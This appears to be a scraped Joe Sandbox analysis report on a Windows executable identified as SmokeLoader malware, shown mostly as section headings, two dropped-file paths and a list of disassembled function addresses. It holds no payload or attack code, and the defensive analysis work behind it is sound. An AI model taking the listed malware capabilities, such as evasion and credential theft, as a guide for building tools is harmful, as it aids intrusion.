Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 50f86ebddd156619b173883981364d8955365d76d2c3a.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\vbirvce

C:\Users\user\AppData\Roaming\vbirvce:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
50f86ebddd156619b173883981364d8955365d76d2c3a.exe

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 00514696 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 0062003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 00620E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Function 00514355 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46
sleepCOMMON